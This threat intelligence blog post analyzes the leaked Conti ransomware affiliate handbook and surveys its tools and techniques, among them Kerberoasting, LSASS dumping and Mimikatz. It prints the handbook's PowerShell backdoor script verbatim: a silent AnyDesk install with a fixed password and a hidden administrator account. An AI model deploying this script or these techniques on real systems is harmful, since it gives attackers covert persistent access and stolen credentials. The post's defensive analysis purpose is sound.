Cyble-Conti-Handbook-Ransomware

Conti Secrets Hacker’s Handbook Leaked

An ex-affiliate of Conti Ransomware released training material used by the Conti core team to train their affiliates to conduct ransomware attacks. We have a screenshot showcasing this below.

Figure 1 post by TA

The Threat Actor (TA) claimed that they posted it because Conti did not fully pay them for their work. The ex-affiliate claims to have received only $1500 for all the work they have done for Conti.

Below is the screenshot for claims made by TA.

Figure 2 claims by TA

In June 2021, Conti had published a post on one of the cybercrime forums where they seemed to be recruiting penetration testers.

Figure 3 recruiting penetration testers

Upon analyzing the document, we found that the basic MO of the group is simple – the core team manages the malware and maintains the onion websites. The recruited affiliates, meanwhile, are tasked with finding vulnerable networks and encrypting them. Conti also provides training materials to their affiliates which include step-by-step techniques to hack networks and maintain access.

Figure 4 CONTI-MO

Below is the screenshot of all the images and files leaked by the associates.

Figure 5 Content of ManualsAndSoftware.rar

We have compiled a list of tools that Conti has created training materials for:

  • Cobalt Strike

Cobalt Strike is a security tool created with the intent of helping penetration testers or red teamers conduct security assessments. Recently, however, cybercriminals have started using this tool because of its rich features and functionalities. The features of this tool range from establishing an initial foothold and initiating a lateral movement to creating persistence on infected systems. Generally, cybercriminals use the cracked version of this tool.

Similarly, here the Conti Group has used the cracked version.

Figure 6 CobaltStrike used by Conti Group
  • alias.rc (custom Metasploit resource script file)

The use case of this script is to generate an alias for various auxiliary and post-exploitation modules available in the Metasploit tool. The below figure shows that various aliases have been created in the Metasploit tool.

Figure 7 Aliases created in Metasploit by using alias.rc resource script
  • Invoke-Kerberoast.ps1

“Invoke-Kerberoast” is a tool developed by harmj0y; this tool has been created to launch Kerberoast attacks. The Kerberoast attack requests the domain controller to retrieve the list of Service Principal Names (SPNs) associated with service accounts created for various services such as SQL.

Once the attacker has the list of SPNs, the attacker can request a Ticket Granting Service (TGS) ticket. Once the TGS ticket has been received, the attacker can use various techniques to export the TGS from the operating system’s memory and perform an offline password cracking method to retrieve the plain text password.

Invoke-Kerberoast PowerShell is an all-in-one tool with all the capabilities from querying to domain control for SPNs and exporting the TGS hash data.

Figure 8 Invoking Kerberoast PowerShell Tool
  • AdFind

AdFind is a post-exploitation tool. It is used when the attacker has a foothold in the client machine that is part of a domain controller network. Using this tool, the attacker can get the details like Active Directory User List, Computers List, Organizational Unit, etc.

Figure 9 Executing adfind.exe
  • PowerView

PowerView is another post-exploitation tool. This tool can be used once the attacker has a foothold in the domain controller network. Leveraging this tool, the attacker can perform multiple tasks, including enumerating the domain controller and extracting the details—E.g., SPN, domain computers, policies, forest, etc.

  • RouterScan

RouterScan is a scanning tool used to identify various router devices in a provided range of IPs. This tool can show details like the device type/information, Extended Service Set Identifier (ESSID), Basic Service Set Identifiers (BSSID), etc. Additionally, this tool also tries to find login/password from a standard list already present in this tool.

Figure 10 Running RouterScan tool
  • PowerUpSQL

PowerUPSQL is yet another post-exploitation tool. This tool is created with the intent to enumerate the SQL Services. One example is executing a system command from a target MSSQL server leveraging the xp_cmdshell function present in MSSQL Service.

  • NGROK

In one of the documents named “RDP NGROK.txt,” the attacker has described the method to access the victim machine over the internet via the Remote Desktop Protocol (RDP) port with the help of the NGROK service.

  • rundll32.exe

“rundll32.exe” is a Microsoft Windows operating system component. Using “rundll32.exe”, the attacker can call the MiniDump API function (Application Programming Interface) from the comsvcs.dll library to generate the LSASS.exe process dump. Later, this dump can extract information such as Windows operating system hashes and passwords utilizing tools like Mimikatz.

  • AnyDesk

The attacker used the below PowerShell code to use AnyDesk as a backdoor. From a remote machine, the attacker can control the victim machine.

Function AnyDesk {
    mkdir "C:\ProgramData\AnyDesk"
    # Download AnyDesk
    $clnt = new-object System.Net.WebClient
    $url = "http:[//]download[.]anydesk.com/AnyDesk.exe"
    $file = "C:\ProgramData\AnyDesk.exe"
    $clnt.DownloadFile($url,$file)
    cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
    cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
    net user oldadministrator "qc69t4B#Z0kE3" /add
    net localgroup Administrators oldadministrator /ADD
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

    cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
    }

Table 1 PowerShell Code to Install AnyDesk

  • TOR

Use of TOR as SOCKS proxy to hide and maintain anonymity.

  • Metasploit

Metasploit is a security tool used by penetration testers, exploit developers, red teamers, etc. The Metasploit tool provides a platform containing many exploits related to various popular services and applications. Additionally, it also holds payloads and auxiliary modules for various other security assessment purposes.

  • Additional script/tools/techniques used by Conti
Sr. NoScript/Tools/TechniquesDescription
1script.shSort details from ad_computers.txt and ad_user.txt generated by AdFind.exe
2Hash in ntds.ditExtracting Hash from ntds.dit file
3netscanScan range of IPs to find Shared Folder
4p.batIterate through the domain.txt file and ping every IP to find which one is live.
5sqlcmd UtilityThe utility is used to query SQL commands remotely
6Net userTo enumerate local users and domain users
7wmicRemotely connect to the machine and execute various commands
8ArmitageA GUI for Metasploit tool
9MimikatzExtracts the hashes and passwords from the memory, performs DCSync, etc.

Table 2 Misc Tools Which are Part Conti PlayBook

About Us:

Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the Darkweb. Its prime focus is to provide organizations with real-time visibility to their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Start-ups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit https://cyble.com.

%d bloggers like this: